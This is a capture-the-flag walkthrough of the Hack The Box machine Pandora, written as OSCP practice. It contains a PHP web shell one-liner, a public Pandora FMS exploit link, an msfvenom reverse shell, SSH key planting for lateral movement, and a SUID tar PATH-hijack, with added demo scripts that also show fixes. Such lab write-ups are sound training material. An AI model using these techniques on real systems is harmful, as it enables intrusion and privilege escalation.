OSCP PREP BOX 9: HtB Pandora
Pandora
We are back with another HtB machine. Today we're taking on Pandora, which is listed as an easy box, although the user ratings lean noticeably towards medium.
So, to start off, we’re going to run nmap and see what we’re working with.
As per usual, we have ports 22 (SSH) and 80 (HTTP) open. Neither service banner looks outdated, so let's head straight over to the web server.
Nothing too crazy off the bat. There is a contact form, which is interesting, but in the interest of multitasking I ran a gobuster directory brute force and an ffuf DNS (vhost) brute force in the background while looking around.
Not much to work with here. The contact form wasn't giving me much to go on, so I went back to nmap to check whether we missed a port because of a firewall and to scan UDP ports as well.
And of course there is a UDP port open: SNMP. I really need to start doing UDP scans off the bat instead of wasting time.
Alright, let's start by footprinting the service. Most of the techniques I used are covered in the HtB CPTS path.
Running snmpwalk against it gives us something useful right away: a set of credentials.
Take those over to SSH and we're in!
A quick look shows two users in /home, daniel and matt. user.txt sits in matt's home directory, so we have to find a way to move laterally.
The first thing I noticed is a web server listening only on the box's internal interface. Curling http://localhost/pandora_console/ from the box works, but the output is unwieldy, so instead I set up a simple SSH local port forward (ssh's -L option) from port 1234 on my machine to port 80 on the box.
Now I can browse to http://localhost:1234/pandora_console/ in Firefox and we have the Pandora FMS login page.
I tried logging in as admin with default credentials, with no success. Daniel's credentials also failed, but with a different message: "API use only." Googling that shows the account is restricted to the Pandora API, so daniel can only talk to pandora_console through api.php, not the web UI. Pandora's documentation shows the version can be read with: curl "http://console_IP/pandora_console/include/api.php?info=version" (quote the URL so the shell doesn't treat the ? as a glob)
So the version is Pandora FMS 7.0 (the 7.0NG.742 build). Googling exploits for that version returns results immediately. I had trouble with the main exploit, but was able to make progress with this GitHub PoC: https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
I created a very simple PHP shell (note the double quotes around cmd: nesting single quotes inside the outer single-quoted string would break the echo): echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php
The shell runs as matt, the account the web server runs under. Let's get our user flag.
Our command shell right now is just basic RCE through the web shell, so we need to upgrade it. As in previous boxes, we drop a reverse shell script on the box and have the web shell execute it. This worked for me, but not from /tmp; I had to use /dev/shm instead (any directory we control that the web server process can also see and execute from will do). One likely cause, if the file was dropped over daniel's SSH session, is that the web server runs under systemd with a private /tmp, so the /tmp it sees is not the one we wrote to, while /dev/shm is shared. To recap: we used msfvenom to craft a shell.sh script, uploaded it to /dev/shm/, gave it execute permissions, and then ran it from the web shell by absolute path: /dev/shm/shell.sh
While doing my usual privilege escalation checks, I noticed an interesting SUID binary. The annoying part is that our current shell can't run sudo: it has no TTY, so sudo can't prompt for a password, and sudo -l fails. So the goal shifts to getting a proper login as matt.
Looking at his home directory, matt has a .ssh directory and we have write access to his authorized_keys file. That is great. All we have to do is generate a key pair on our Kali box, append the public key to matt's authorized_keys, and SSH in as matt.
To walk through the steps, on our Kali box:
ssh-keygen -t ed25519 -C "<random words>"
Save the key in the default location
Leave the passphrase blank.
cat ~/.ssh/id_ed25519.pub
Copy that value.
Now, in the shell we have as matt, run:
echo "<the copied value>" >> ~/.ssh/authorized_keys
Now we can SSH in with:
ssh -i ~/.ssh/id_ed25519 matt@10.10.11.136
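The key-install step above, as an added example that is not part of the original write-up: the same append, but idempotent and with the ownership and mode checks sshd applies (with StrictModes, a group- or world-writable authorized_keys or .ssh directory makes the key silently unusable). The home directory is a parameter so it can be exercised against a temporary directory, and the public key string is a constructed placeholder, not real key material.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: install a public key into a
# target account's authorized_keys the way the lateral move above does, but
# idempotently and with the permissions sshd expects (~/.ssh 700, file 600).
# SAMPLE_PUBKEY is a constructed placeholder, not a real key.
set -u

SAMPLE_PUBKEY="ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialOnlyForThisDemo00000000 kali"

# install_authorized_key <home_dir> <public key line>
install_authorized_key() {
    home_dir="$1"
    pubkey="$2"
    ssh_dir="$home_dir/.ssh"
    auth="$ssh_dir/authorized_keys"

    mkdir -p "$ssh_dir"
    chmod 700 "$ssh_dir"
    touch "$auth"
    # Append only if this exact line is not already present, so running
    # the step twice does not pile up duplicate keys.
    if ! grep -qxF "$pubkey" "$auth"; then
        printf '%s\n' "$pubkey" >> "$auth"
    fi
    # sshd (StrictModes yes, the default) refuses keys from a file that is
    # group- or world-writable; this is the usual reason a freshly appended
    # key "doesn't work".
    chmod 600 "$auth"
}

# count_key <home_dir> <public key line>: how many times the key occurs.
count_key() {
    grep -cxF "$2" "$1/.ssh/authorized_keys"
}

# auth_mode <home_dir>: octal mode of authorized_keys (GNU stat assumed).
auth_mode() {
    stat -c '%a' "$1/.ssh/authorized_keys"
}
```

On the box, matt's home directory is the argument; the same function works over the web shell as long as the account can write to its own .ssh directory.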
Alright. That was a slightly devious detour towards our privilege escalation, but it works: sudo -l now prompts for a password, which confirms we have a proper TTY session as matt.
So, let's poke at the SUID binary we found, /usr/bin/pandora_backup.
Running it spits out a huge amount of output: it is backing up the Pandora console's files. To see what the binary actually does, we can use ltrace. ltrace traces the calls a program makes into shared libraries (libc, for example) and shows the arguments passed to those functions and their return values, which makes it a great debugging tool. So let's see what this binary is doing:
We can see it runs the tar command, but never by absolute path, so tar is looked up through PATH, and PATH is an environment variable we control. That means we can put a directory we own first in PATH, drop our own tar there that launches a shell, and pandora_backup will execute it with root privileges. Let's dig in.
I ran this from /dev/shm, since that is a directory we have complete control of.
So to start, we prepend /dev/shm to matt's PATH so it is searched before /usr/bin.
We can do that with "export PATH=/dev/shm:$PATH"
Now let's create our malicious tar.
I created a very simple bash script named tar:
Now all that’s left is to run /usr/bin/pandora_backup!
We are root!
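The mechanics of this hijack, reproduced as an added example that is not code from the write-up: a stand-in for pandora_backup that invokes tar by bare name (what ltrace showed), a scratch "system" tar, and an attacker-controlled tar in a directory prepended to PATH, alongside the two fixes a SUID program should use. Everything lives in a temporary directory, so it runs as an unprivileged user with no SUID bit involved and never touches /dev/shm; the directory names and the HIJACKED marker are assumptions made for the demo.

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: a self-contained
# reproduction of the PATH hijack used against /usr/bin/pandora_backup.
# It creates a scratch "system" tar and an attacker-controlled tar in a
# temp directory, so it runs unprivileged with no SUID bit and never
# touches /dev/shm. Directory names and the HIJACKED marker are assumptions.
set -u

WORK="$(mktemp -d)"
trap 'rm -rf "$WORK"' EXIT
mkdir -p "$WORK/usrbin" "$WORK/shm"

# Stand-in for the distribution's tar, the one pandora_backup meant to run.
printf '#!/bin/sh\necho "real tar: $*"\n' > "$WORK/usrbin/tar"
# Attacker's tar. On the box this was a script that launched bash; here it
# only prints a marker so the result can be checked.
printf '#!/bin/sh\necho HIJACKED\n' > "$WORK/shm/tar"
chmod 755 "$WORK/usrbin/tar" "$WORK/shm/tar"

# Mimics what ltrace showed: tar invoked by bare name, resolved through
# whatever PATH the calling process inherited.
vulnerable_backup() {
    tar -cvf backup.tar pandora_console
}

# Fix 1: an absolute path, so PATH is never consulted.
fixed_backup_abspath() {
    "$WORK/usrbin/tar" -cvf backup.tar pandora_console
}

# Fix 2: reset PATH to trusted directories before the call, which is what
# a SUID program should do before system() or execvp().
fixed_backup_cleanpath() {
    ( PATH="$WORK/usrbin"; tar -cvf backup.tar pandora_console )
}

# The attacker's environment: the writable directory prepended to PATH,
# exactly as `export PATH=/dev/shm:$PATH` did on the box.
ATTACKER_PATH="$WORK/shm:$WORK/usrbin"

# Which tar does a bare lookup hit first? Same check as `type -a tar`.
resolve_tar_hijacked() {
    ( PATH="$ATTACKER_PATH"; command -v tar )
}
run_hijacked() {
    ( PATH="$ATTACKER_PATH"; vulnerable_backup )
}
run_fixed_abspath() {
    ( PATH="$ATTACKER_PATH"; fixed_backup_abspath )
}
run_fixed_cleanpath() {
    ( PATH="$ATTACKER_PATH"; fixed_backup_cleanpath )
}
```

Only the bare-name call is hijackable; both fixed variants reach the intended tar even with the attacker's directory first in PATH. One caveat for the real thing: if the shell your fake tar spawns drops back to matt, the SUID binary only raised the effective UID, and bash resets it unless started with bash -p.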
All in all, a fun box with a lot of variety.